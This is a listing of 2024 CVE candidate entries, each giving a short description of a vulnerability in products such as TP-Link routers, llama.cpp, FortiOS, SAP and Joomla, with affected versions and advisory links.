CVE 2024 21833 Candidate Multiple TP-LINK products allow a network-adjacent unauthenticated attacker with access to the product to execute arbitrary OS commands. Affected products/versions are as follows: Archer AX3000 firmware versions prior to "Archer AX3000(JP)_V1_1.1.2 Build 20231115", Archer AX5400 firmware versions prior to "Archer AX5400(JP)_V1_1.1.2 Build 20231115", Archer AXE75 firmware versions prior to "Archer AXE75(JP)_V1_231115", Deco X50 firmware versions prior to "Deco X50(JP)_V1_1.4.1 Build 20231122", and Deco XE200 firmware versions prior to "Deco XE200(JP)_V1_1.2.5 Build 20231120". MISC:https://jvn.jp/en/vu/JVNVU91401812/ | URL:https://jvn.jp/en/vu/JVNVU91401812/ | MISC:https://www.tp-link.com/jp/support/download/archer-ax3000/#Firmware | URL:https://www.tp-link.com/jp/support/download/archer-ax3000/#Firmware | MISC:https://www.tp-link.com/jp/support/download/archer-ax5400/#Firmware | URL:https://www.tp-link.com/jp/support/download/archer-ax5400/#Firmware | MISC:https://www.tp-link.com/jp/support/download/archer-axe75/#Firmware | URL:https://www.tp-link.com/jp/support/download/archer-axe75/#Firmware | MISC:https://www.tp-link.com/jp/support/download/deco-x50/v1/#Firmware | URL:https://www.tp-link.com/jp/support/download/deco-x50/v1/#Firmware | MISC:https://www.tp-link.com/jp/support/download/deco-xe200/#Firmware | URL:https://www.tp-link.com/jp/support/download/deco-xe200/#Firmware Assigned (20240104)
CVE 2024 21826 Candidate in OpenHarmony v3.2.4 and prior versions allow a local attacker cause sensitive information leak through insecure storage. MISC:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-03.md | URL:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-03.md Assigned (20240106)
CVE 2024 21825 Candidate A heap-based buffer overflow vulnerability exists in the GGUF library GGUF_TYPE_ARRAY/GGUF_TYPE_STRING parsing functionality of llama.cpp Commit 18c2e17. A specially crafted .gguf file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1912 | URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1912 Assigned (20240118)
CVE 2024 21824 Candidate Improper authentication vulnerability in exists in multiple printers and scanners which implement Web Based Management provided by BROTHER INDUSTRIES, LTD. If this vulnerability is exploited, a network-adjacent user who can access the product may impersonate an administrative user. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References]. MISC:https://jvn.jp/en/jp/JVN82749078/ | URL:https://jvn.jp/en/jp/JVN82749078/ | MISC:https://support.brother.com/g/b/link.aspx?prod=group2&faqid=faqp00100601_000 | URL:https://support.brother.com/g/b/link.aspx?prod=group2&faqid=faqp00100601_000 | MISC:https://support.brother.com/g/b/link.aspx?prod=lmgroup1&faqid=faq00100823_000 | URL:https://support.brother.com/g/b/link.aspx?prod=lmgroup1&faqid=faq00100823_000 | MISC:https://www.fujifilm.com/fbglobal/eng/company/news/notice/2024/0306_2_announce.html | URL:https://www.fujifilm.com/fbglobal/eng/company/news/notice/2024/0306_2_announce.html | MISC:https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2024-000002 | URL:https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2024-000002 | MISC:https://www.toshibatec.com/information/20240306_01.html | URL:https://www.toshibatec.com/information/20240306_01.html Assigned (20240209)
CVE 2024 21821 Candidate Multiple TP-LINK products allow a network-adjacent authenticated attacker to execute arbitrary OS commands. Affected products/versions are as follows: Archer AX3000 firmware versions prior to "Archer AX3000(JP)_V1_1.1.2 Build 20231115", Archer AX5400 firmware versions prior to "Archer AX5400(JP)_V1_1.1.2 Build 20231115", and Archer AXE75 firmware versions prior to "Archer AXE75(JP)_V1_231115". MISC:https://jvn.jp/en/vu/JVNVU91401812/ | URL:https://jvn.jp/en/vu/JVNVU91401812/ | MISC:https://www.tp-link.com/jp/support/download/archer-ax3000/#Firmware | URL:https://www.tp-link.com/jp/support/download/archer-ax3000/#Firmware | MISC:https://www.tp-link.com/jp/support/download/archer-ax5400/#Firmware | URL:https://www.tp-link.com/jp/support/download/archer-ax5400/#Firmware | MISC:https://www.tp-link.com/jp/support/download/archer-axe75/#Firmware | URL:https://www.tp-link.com/jp/support/download/archer-axe75/#Firmware Assigned (20240104)
CVE 2024 2182 Candidate A flaw was found in the Open Virtual Network (OVN). In OVN clusters where BFD is used between hypervisors for high availability, an attacker can inject specially crafted BFD packets from inside unprivileged workloads, including virtual machines or containers, that can trigger a denial of service. FEDORA:FEDORA-2024-082155d6b7 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APR4GCVCMQD3DQUKXDNGIXCCYGE5V7IT/ | FEDORA:FEDORA-2024-7c11edcd20 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XRKXOOOKD56TY3JQVB45N3GCTX3EG4BV/ | FEDORA:FEDORA-2024-bf29e92de4 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CB4N522FCS4XWAPUKRWZF6QZ657FCIDF/ | MISC:RHBZ#2267840 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2267840 | MISC:RHSA-2024:1385 | URL:https://access.redhat.com/errata/RHSA-2024:1385 | MISC:RHSA-2024:1386 | URL:https://access.redhat.com/errata/RHSA-2024:1386 | MISC:RHSA-2024:1387 | URL:https://access.redhat.com/errata/RHSA-2024:1387 | MISC:RHSA-2024:1388 | URL:https://access.redhat.com/errata/RHSA-2024:1388 | MISC:RHSA-2024:1390 | URL:https://access.redhat.com/errata/RHSA-2024:1390 | MISC:RHSA-2024:1391 | URL:https://access.redhat.com/errata/RHSA-2024:1391 | MISC:RHSA-2024:1392 | URL:https://access.redhat.com/errata/RHSA-2024:1392 | MISC:RHSA-2024:1393 | URL:https://access.redhat.com/errata/RHSA-2024:1393 | MISC:RHSA-2024:1394 | URL:https://access.redhat.com/errata/RHSA-2024:1394 | MISC:https://access.redhat.com/security/cve/CVE-2024-2182 | URL:https://access.redhat.com/security/cve/CVE-2024-2182 | MISC:https://mail.openvswitch.org/pipermail/ovs-announce/2024-March/000346.html | URL:https://mail.openvswitch.org/pipermail/ovs-announce/2024-March/000346.html | MISC:https://www.openwall.com/lists/oss-security/2024/03/12/5 | URL:https://www.openwall.com/lists/oss-security/2024/03/12/5 Assigned (20240305)
CVE 2024 21816 Candidate in OpenHarmony v4.0.0 and prior versions allow a local attacker cause information leak through improper preservation of permissions. MISC:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-03.md | URL:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-03.md Assigned (20240106)
CVE 2024 21815 Candidate Insufficiently protected credentials (CWE-522) for third party DVR integrations to the Command Centre Server are accessible to authenticated but unprivileged users. This issue affects: Gallagher Command Centre 9.00 prior to vEL9.00.1774 (MR2), 8.90 prior to vEL8.90.1751 (MR3), 8.80 prior to vEL8.80.1526 (MR4), 8.70 prior to vEL8.70.2526 (MR6), all version of 8.60 and prior. MISC:https://security.gallagher.com/Security-Advisories/CVE-2024-21815 | URL:https://security.gallagher.com/Security-Advisories/CVE-2024-21815 Assigned (20240205)
CVE 2024 21812 Candidate An integer overflow vulnerability exists in the sopen_FAMOS_read functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .famos file can lead to an out-of-bounds write which in turn can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability. MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1921 | URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1921 Assigned (20240123)
CVE 2024 21805 Candidate Improper access control vulnerability exists in the specific folder of SKYSEA Client View versions from Ver.16.100 prior to Ver.19.2. If this vulnerability is exploited, an arbitrary file may be placed in the specific folder by a user who can log in to the PC where the product's Windows client is installed. In case the file is a specially crafted DLL file, arbitrary code may be executed with SYSTEM privilege. MISC:https://jvn.jp/en/jp/JVN54451757/ | URL:https://jvn.jp/en/jp/JVN54451757/ | MISC:https://www.skyseaclientview.net/news/240307_01/ | URL:https://www.skyseaclientview.net/news/240307_01/ Assigned (20240227)
CVE 2024 21803 Candidate Use After Free vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (bluetooth modules) allows Local Execution of Code. This vulnerability is associated with program files https://gitee.Com/anolis/cloud-kernel/blob/devel-5.10/net/bluetooth/af_bluetooth.C. This issue affects Linux kernel: from v2.6.12-rc2 before v6.8-rc1. MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8081 | URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8081 Assigned (20240115)
CVE 2024 21802 Candidate A heap-based buffer overflow vulnerability exists in the GGUF library info->ne functionality of llama.cpp Commit 18c2e17. A specially crafted .gguf file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1914 | URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1914 Assigned (20240118)
CVE 2024 2180 Candidate Zemana AntiLogger v2.74.204.664 is vulnerable to a Memory Information Leak vulnerability by triggering the 0x80002020 IOCTL code of the zam64.sys and zamguard64.sys drivers MISC:https://fluidattacks.com/advisories/gomez/ | URL:https://fluidattacks.com/advisories/gomez/ | MISC:https://zemana.com/us/antilogger.html | URL:https://zemana.com/us/antilogger.html Assigned (20240304)
CVE 2024 21798 Candidate ELECOM wireless LAN routers contain a cross-site scripting vulnerability. Assume that a malicious administrative user configures the affected product with specially crafted content. When another administrative user logs in and operates the product, an arbitrary script may be executed on the web browser. Affected products and versions are as follows: WRC-1167GS2-B v1.67 and earlier, WRC-1167GS2H-B v1.67 and earlier, WRC-2533GS2-B v1.62 and earlier, WRC-2533GS2-W v1.62 and earlier, and WRC-2533GS2V-B v1.62 and earlier. MISC:https://jvn.jp/en/jp/JVN44166658/ | URL:https://jvn.jp/en/jp/JVN44166658/ | MISC:https://www.elecom.co.jp/news/security/20240220-01/ | URL:https://www.elecom.co.jp/news/security/20240220-01/ Assigned (20240215)
CVE 2024 21796 Candidate Electronic Deliverables Creation Support Tool (Construction Edition) prior to Ver1.0.4 and Electronic Deliverables Creation Support Tool (Design & Survey Edition) prior to Ver1.0.4 improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker. MISC:https://jvn.jp/en/jp/JVN40049211/ | URL:https://jvn.jp/en/jp/JVN40049211/ | MISC:https://www.dfeg.mod.go.jp/hp/contents-dfis/tool.html | URL:https://www.dfeg.mod.go.jp/hp/contents-dfis/tool.html Assigned (20240112)
CVE 2024 21795 Candidate A heap-based buffer overflow vulnerability exists in the .egi parsing functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .egi file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability. MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1920 | URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1920 Assigned (20240122)
CVE 2024 21794 Candidate In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an attacker can redirect users to malicious pages through the login page. MISC:https://rapidscada.org/contact/ | URL:https://rapidscada.org/contact/ | MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03 Assigned (20240105)
CVE 2024 2179 Candidate Concrete CMS version 9 before 9.2.7 is vulnerable to Stored XSS via the Name field of a Group type since there is insufficient validation of administrator provided data for that field. A rogue administrator could inject malicious code into the Name field which might be executed when users visit the affected page. The Concrete CMS security team gave this vulnerability a CVSS v3.1 score of 2.2 with a vector of AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N Concrete versions below 9 do not include group types so they are not affected by this vulnerability. Thanks Luca Fuda for reporting. MISC:https://documentation.concretecms.org/9-x/developers/introduction/version-history/927-release-notes | URL:https://documentation.concretecms.org/9-x/developers/introduction/version-history/927-release-notes Assigned (20240304)
CVE 2024 21789 Candidate When a BIG-IP ASM/Advanced WAF security policy is configured on a virtual server, undisclosed requests can cause an increase in memory resource utilization. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K000137270 | URL:https://my.f5.com/manage/s/article/K000137270 Assigned (20240201)
CVE 2024 21782 Candidate BIG-IP or BIG-IQ Resource Administrators and Certificate Managers who have access to the secure copy (scp) utility but do not have access to Advanced shell (bash) can execute arbitrary commands with a specially crafted command string. This vulnerability is due to an incomplete fix for CVE-2020-5873. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K98606833 | URL:https://my.f5.com/manage/s/article/K98606833 Assigned (20240201)
CVE 2024 21780 Candidate Stack-based buffer overflow vulnerability exists in HOME SPOT CUBE2 V102 and earlier. Processing a specially crafted command may result in a denial of service (DoS) condition. Note that the affected products are no longer supported. MISC:https://jvn.jp/en/vu/JVNVU93740658/ | URL:https://jvn.jp/en/vu/JVNVU93740658/ | MISC:https://www.au.com/support/service/mobile/guide/wlan/home_spot_cube_2/ | URL:https://www.au.com/support/service/mobile/guide/wlan/home_spot_cube_2/ Assigned (20240125)
CVE 2024 21775 Candidate Zoho ManageEngine Exchange Reporter Plus versions 5714 and below are vulnerable to the Authenticated SQL injection in report exporting feature. MISC:https://www.manageengine.com/products/exchange-reports/advisory/CVE-2024-21775.html | URL:https://www.manageengine.com/products/exchange-reports/advisory/CVE-2024-21775.html Assigned (20240111)
CVE 2024 21773 Candidate Multiple TP-LINK products allow a network-adjacent unauthenticated attacker with access to the product to execute arbitrary OS commands. Affected products/versions are as follows: Archer AX3000 firmware versions prior to "Archer AX3000(JP)_V1_1.1.2 Build 20231115", Archer AX5400 firmware versions prior to "Archer AX5400(JP)_V1_1.1.2 Build 20231115", Deco X50 firmware versions prior to "Deco X50(JP)_V1_1.4.1 Build 20231122", and Deco XE200 firmware versions prior to "Deco XE200(JP)_V1_1.2.5 Build 20231120". MISC:https://jvn.jp/en/vu/JVNVU91401812/ | URL:https://jvn.jp/en/vu/JVNVU91401812/ | MISC:https://www.tp-link.com/jp/support/download/archer-ax3000/#Firmware | URL:https://www.tp-link.com/jp/support/download/archer-ax3000/#Firmware | MISC:https://www.tp-link.com/jp/support/download/archer-ax5400/#Firmware | URL:https://www.tp-link.com/jp/support/download/archer-ax5400/#Firmware | MISC:https://www.tp-link.com/jp/support/download/deco-x50/v1/#Firmware | URL:https://www.tp-link.com/jp/support/download/deco-x50/v1/#Firmware | MISC:https://www.tp-link.com/jp/support/download/deco-xe200/#Firmware | URL:https://www.tp-link.com/jp/support/download/deco-xe200/#Firmware Assigned (20240104)
CVE 2024 21771 Candidate For unspecified traffic patterns, BIG-IP AFM IPS engine may spend an excessive amount of time matching the traffic against signatures, resulting in Traffic Management Microkernel (TMM) restarting and traffic disruption. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K000137595 | URL:https://my.f5.com/manage/s/article/K000137595 Assigned (20240201)
CVE 2024 21767 Candidate A remote attacker may be able to bypass access control of Commend WS203VICM by creating a malicious request. MISC:https://clibrary-online.commend.com/en/cyber-security/security-advisories.html | URL:https://clibrary-online.commend.com/en/cyber-security/security-advisories.html | MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-051-01 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-051-01 Assigned (20240130)
CVE 2024 21765 Candidate Electronic Delivery Check System (Doboku) Ver.18.1.0 and earlier, Electronic Delivery Check System (Dentsu) Ver.12.1.0 and earlier, Electronic Delivery Check System (Kikai) Ver.10.1.0 and earlier, and Electronic delivery item Inspection Support SystemVer.4.0.31 and earlier improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker. MISC:http://www.cals-ed.go.jp/checksys-release-20231130/ | URL:http://www.cals-ed.go.jp/checksys-release-20231130/ | MISC:https://jvn.jp/en/jp/JVN77736613/ | URL:https://jvn.jp/en/jp/JVN77736613/ | MISC:https://www.ysk.nilim.go.jp/cals/ | URL:https://www.ysk.nilim.go.jp/cals/ Assigned (20240112)
CVE 2024 21764 Candidate In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, the product uses hard-coded credentials, which may allow an attacker to connect to a specific port. MISC:https://rapidscada.org/contact/ | URL:https://rapidscada.org/contact/ | MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03 Assigned (20240105)
CVE 2024 21763 Candidate When BIG-IP AFM Device DoS or DoS profile is configured with NXDOMAIN attack vector and bad actor detection, undisclosed queries can cause the Traffic Management Microkernel (TMM) to terminate. NOTE: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K000137521 | URL:https://my.f5.com/manage/s/article/K000137521 Assigned (20240201)
CVE 2024 21762 Candidate A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows attacker to execute unauthorized code or commands via specifically crafted requests MISC:https://fortiguard.com/psirt/FG-IR-24-015 | URL:https://fortiguard.com/psirt/FG-IR-24-015 Assigned (20240102)
CVE 2024 21761 Candidate An improper authorization vulnerability [CWE-285] in FortiPortal version 7.2.0, and versions 7.0.6 and below reports may allow a user to download other organizations reports via modification in the request payload. MISC:https://fortiguard.com/psirt/FG-IR-24-016 | URL:https://fortiguard.com/psirt/FG-IR-24-016 Assigned (20240102)
CVE 2024 2176 Candidate Use after free in FedCM in Google Chrome prior to 122.0.6261.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-5dacab5f00 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OYEGSHTMXIPXD5OW5CXVWQS3ZUBCBSXG/ | MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop.html | URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop.html | MISC:https://issues.chromium.org/issues/325936438 | URL:https://issues.chromium.org/issues/325936438 Assigned (20240304)
CVE 2024 21752 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Ernest Marcinko Ajax Search Lite allows Reflected XSS.This issue affects Ajax Search Lite: from n/a through 4.11.4. MISC:https://patchstack.com/database/vulnerability/ajax-search-lite/wordpress-ajax-search-lite-plugin-4-11-4-reflected-xss-via-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/ajax-search-lite/wordpress-ajax-search-lite-plugin-4-11-4-reflected-xss-via-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240102)
CVE 2024 21750 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scribit Shortcodes Finder allows Reflected XSS.This issue affects Shortcodes Finder: from n/a through 1.5.5. MISC:https://patchstack.com/database/vulnerability/shortcodes-finder/wordpress-shortcodes-finder-plugin-1-5-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/shortcodes-finder/wordpress-shortcodes-finder-plugin-1-5-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240102)
CVE 2024 21749 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Atakan Au 1 click disable all.This issue affects 1 click disable all: from n/a through 1.0.1. MISC:https://patchstack.com/database/vulnerability/first-graders-toolbox/wordpress-1-click-disable-all-plugin-1-0-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/first-graders-toolbox/wordpress-1-click-disable-all-plugin-1-0-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240102)
CVE 2024 21747 Candidate Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in weDevs WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting.This issue affects WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting: from n/a through 1.12.8. MISC:https://patchstack.com/database/vulnerability/erp/wordpress-wp-erp-plugin-1-12-8-sql-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/erp/wordpress-wp-erp-plugin-1-12-8-sql-injection-vulnerability?_s_id=cve Assigned (20240102)
CVE 2024 21745 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Laybuy Laybuy Payment Extension for WooCommerce allows Stored XSS.This issue affects Laybuy Payment Extension for WooCommerce: from n/a through 5.3.9. MISC:https://patchstack.com/database/vulnerability/laybuy-gateway-for-woocommerce/wordpress-laybuy-payment-extension-for-woocommerce-plugin-5-3-9-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/laybuy-gateway-for-woocommerce/wordpress-laybuy-payment-extension-for-woocommerce-plugin-5-3-9-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240102)
CVE 2024 21744 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mapster Technology Inc. Mapster WP Maps allows Stored XSS.This issue affects Mapster WP Maps: from n/a through 1.2.38. MISC:https://patchstack.com/database/vulnerability/mapster-wp-maps/wordpress-mapster-wp-maps-plugin-1-2-38-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/mapster-wp-maps/wordpress-mapster-wp-maps-plugin-1-2-38-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240102)
CVE 2024 21742 Candidate Improper input validation allows for header injection in MIME4J library when using MIME4J DOM for composing message. This can be exploited by an attacker to add unintended headers to MIME messages. MISC:https://lists.apache.org/thread/nrqzg93219wdj056pqfszsd33dc54kfy | URL:https://lists.apache.org/thread/nrqzg93219wdj056pqfszsd33dc54kfy | MLIST:[oss-security] 20240227 CVE-2024-21742: Apache James Mime4J: Mime4J DOM header injection | URL:http://www.openwall.com/lists/oss-security/2024/02/27/5 Assigned (20240102)
CVE 2024 2174 Candidate Inappropriate implementation in V8 in Google Chrome prior to 122.0.6261.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-5dacab5f00 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OYEGSHTMXIPXD5OW5CXVWQS3ZUBCBSXG/ | MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop.html | URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop.html | MISC:https://issues.chromium.org/issues/325866363 | URL:https://issues.chromium.org/issues/325866363 Assigned (20240304)
CVE 2024 21738 Candidate SAP NetWeaver ABAP Application Server and ABAP Platform do not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An attacker with low privileges can cause limited impact to confidentiality of the application data after successful exploitation. MISC:https://me.sap.com/notes/3387737 | URL:https://me.sap.com/notes/3387737 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240101)
CVE 2024 21737 Candidate In SAP Application Interface Framework File Adapter - version 702, a high privilege user can use a function module to traverse through various layers and execute OS commands directly. By this, such user can control the behaviour of the application. This leads to considerable impact on confidentiality, integrity and availability. MISC:https://me.sap.com/notes/3411869 | URL:https://me.sap.com/notes/3411869 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240101)
CVE 2024 21736 Candidate SAP S/4HANA Finance for (Advanced Payment Management) - versions SAPSCORE 128, S4CORE 107, does not perform necessary authorization checks. A function import could be triggered allowing the attacker to create in-house bank accounts leading to low impact on the confidentiality of the application. MISC:https://me.sap.com/notes/3260667 | URL:https://me.sap.com/notes/3260667 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240101)
CVE 2024 21735 Candidate SAP LT Replication Server - version S4CORE 103, S4CORE 104, S4CORE 105, S4CORE 106, S4CORE 107, S4CORE 108, does not perform necessary authorization checks. This could allow an attacker with high privileges to perform unintended actions, resulting in escalation of privileges, which has High impact on confidentiality, integrity and availability of the system. MISC:https://me.sap.com/notes/3407617 | URL:https://me.sap.com/notes/3407617 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240101)
CVE 2024 21734 Candidate SAP Marketing (Contacts App) - version 160, allows an attacker with low privileges to trick a user to open malicious page which could lead to a very convincing phishing attack with low impact on confidentiality and integrity of the application. MISC:https://me.sap.com/notes/3190894 | URL:https://me.sap.com/notes/3190894 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240101)
CVE 2024 21733 Candidate Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43. Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue. CONFIRM:https://security.netapp.com/advisory/ntap-20240216-0005/ | MISC:http://packetstormsecurity.com/files/176951/Apache-Tomcat-8.5.63-9.0.43-HTTP-Response-Smuggling.html | MISC:https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz | URL:https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz | MLIST:[oss-security] 20240119 CVE-2024-21733: Apache Tomcat: Leaking of unrelated request bodies in default error page | URL:http://www.openwall.com/lists/oss-security/2024/01/19/2 Assigned (20240101)
CVE 2024 21732 Candidate FlyCms through abbaa5a allows XSS via the permission management feature. MISC:https://github.com/Ghostfox2003/cms/blob/main/1.md Assigned (20240101)
CVE 2024 2173 Candidate Out of bounds memory access in V8 in Google Chrome prior to 122.0.6261.111 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-5dacab5f00 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OYEGSHTMXIPXD5OW5CXVWQS3ZUBCBSXG/ | MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop.html | URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop.html | MISC:https://issues.chromium.org/issues/325893559 | URL:https://issues.chromium.org/issues/325893559 Assigned (20240304)
CVE 2024 21728 Candidate An Open Redirect vulnerability was found in osTicky2 below 2.2.8. osTicky (osTicket Bridge) by SmartCalc is a Joomla 3.x extension that provides Joomla fronted integration with osTicket, a popular Support ticket system. The Open Redirect vulnerability allows attackers to control the return parameter in the URL to a base64 malicious URL. MISC:https://github.com/solracsf/osTicky | URL:https://github.com/solracsf/osTicky Assigned (20240101)
CVE 2024 21727 Candidate XSS vulnerability in DP Calendar component for Joomla. MISC:https://extensions.joomla.org/extension/dpcalendar/ | URL:https://extensions.joomla.org/extension/dpcalendar/ Assigned (20240101)
CVE 2024 21726 Candidate Inadequate content filtering leads to XSS vulnerabilities in various components. MISC:https://developer.joomla.org/security-centre/929-20240205-core-inadequate-content-filtering-within-the-filter-code.html | URL:https://developer.joomla.org/security-centre/929-20240205-core-inadequate-content-filtering-within-the-filter-code.html Assigned (20240101)
CVE 2024 21725 Candidate Inadequate escaping of mail addresses lead to XSS vulnerabilities in various components. MISC:https://developer.joomla.org/security-centre/928-20240204-core-xss-in-mail-address-outputs.html | URL:https://developer.joomla.org/security-centre/928-20240204-core-xss-in-mail-address-outputs.html Assigned (20240101)
CVE 2024 21724 Candidate Inadequate input validation for media selection fields lead to XSS vulnerabilities in various extensions. MISC:https://developer.joomla.org/security-centre/927-20240203-core-xss-in-media-selection-fields.html | URL:https://developer.joomla.org/security-centre/927-20240203-core-xss-in-media-selection-fields.html Assigned (20240101)
CVE 2024 21723 Candidate Inadequate parsing of URLs could result into an open redirect. MISC:https://developer.joomla.org/security-centre/926-20240202-core-open-redirect-in-installation-application.html | URL:https://developer.joomla.org/security-centre/926-20240202-core-open-redirect-in-installation-application.html Assigned (20240101)
CVE 2024 21722 Candidate The MFA management features did not properly terminate existing user sessions when a user's MFA methods have been modified. MISC:https://developer.joomla.org/security-centre/925-20240201-core-insufficient-session-expiration-in-mfa-management-views.html | URL:https://developer.joomla.org/security-centre/925-20240201-core-insufficient-session-expiration-in-mfa-management-views.html Assigned (20240101)
